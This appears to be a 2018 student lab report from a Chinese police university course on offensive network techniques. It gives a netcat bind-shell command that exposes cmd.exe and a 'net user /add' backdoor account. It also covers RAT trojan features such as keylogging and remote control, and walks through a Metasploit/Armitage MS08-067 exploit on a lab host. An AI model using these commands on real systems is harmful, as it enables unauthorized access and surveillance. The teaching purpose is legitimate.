• 实验报告四


    中国人民公安大学

    Chinese people public security university

     

    网络对抗技术

    实验报告

     

    实验四

    恶意代码技术

     

     

     

    学生姓名

    王磊

    年级

    2015 

    区队

     二

    指导教师

    高见 

     

     

    信息技术与网络安全学院

    201810月10

     

    实验任务总纲

    2018—2019 学年 第  学期

    一、实验目的

    1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

    2.了解并熟悉常用的网络攻击工具,木马的基本功能;

    3.达到巩固课程知识和实际应用的目的。

    二、实验要求

    1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

    2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

    3.软件工具可使用NC、MSF等。

    4.实验结束后,保留电子文档。

    、实验步骤

    1.准备

    提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

    2.实验环境

    描述实验所使用的硬件和软件环境(包括各种软件工具);

    开机并启动软件office2003或2007、浏览器、加解密软件。

    3.实验过程

    1)启动系统和启动工具软件环境。

    2)用软件工具实现实验内容。

    4.实验报告

    按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

    任务一 利用NC控制电脑

     NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

    实验过程需要两个同学相互配合完成:

    步骤一:

       在受害者的机器 (同学A)
    输入下面的命令:
      nc.exe -l -p port -e cmd.exe   进入监听模式

    步骤二:
      在攻击者的机器.(同学B)
    输入下面的命令:
      nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

    步骤三:

        在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

     可以继续通过命令行做一些事情。

    任务二 利用木马控制电脑

    实验过程需要两个同学配合:

    步骤一:

        攻击者的机器. (同学A)
    打开V2014.exe程序或则star RAT,这两个木马功能类似。

    步骤四:

    在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

    1. 文件管理,尝试拷贝文件
    2. 屏幕控制,尝试获取桌面
    3. 键盘记录,尝试获取对方击键记录
    4. 会话管理,重启对方机器,查看是否能自启动上线

    任务三 通过漏洞获取shell  所有过程截图写博客

     windows ms08067 漏洞利用

    一.1 知识背景

    Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。

    Metasploit Framework并不止具有exploit(溢出)收集功能,它使你专注于创建自己的溢出模块或者二次开发。很少的一部分用汇编和C语言实现,其余均由ruby实现。总体架构:

    一.2 实训环境

    Windows XP SP3

    IP:192.168.252.137

     

    Kali Linux 

    IP:192.168.252.136

     

    一.3 实训原理

    漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

    Armitage基本介绍

          Armitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。

    一.4 漏洞利用过程

    在msfconsole使用search命令搜索MS08067漏洞攻击程序

    实验步骤二

    利用Armitage对目标系统进行扫描

         扫描目标网段完整信息,确认目标网络拓扑结构是网络侦查的重要实施方法。依次选择Host-Nmap Scan-Quick Scan(OS detect),弹出对话框填写目标主机所在的192.168.252.0/24。

    定向扫描目标主机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据。选中目标主机192.168.31.137,右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,对其进行漏洞扫描。

     利用第3步中扫描探测得到的漏洞信息,自动搜索Metasploit攻击模块库,寻找合适的攻击模块。选中192.168.252.137主机,依次选择菜单栏Attacks-Find Attacks,Armitage会开始自动搜索寻找合适的攻击模块。

     

    实验步骤三

    Armitage利用MS08_067漏洞攻击XP主机

      

     

      攻击完成后,目标主机的图标会发生明显变化,Armitage会自动建立一个驻留在内存的shellcode 也就是Meterpreter,右键打开Meterpreter shell,输入getuid命令查看当前用户的权限是SYSTEM权限,攻击完成。

  • 相关阅读:
    pandas isin 和not in
    游戏开发需要学什么?
    打开页面,数字会自增的效果怎么弄?
    jq 导航栏点击添加/删除类(a标签跳转页面)
    bootstrap+jq分页
    2020/12/18
    2020/12/17
    2020/12/16
    2020/12/15
    2020/12/14
  • 原文地址:https://www.cnblogs.com/P201521420030/p/9891166.html
Copyright © 2020-2023  润新知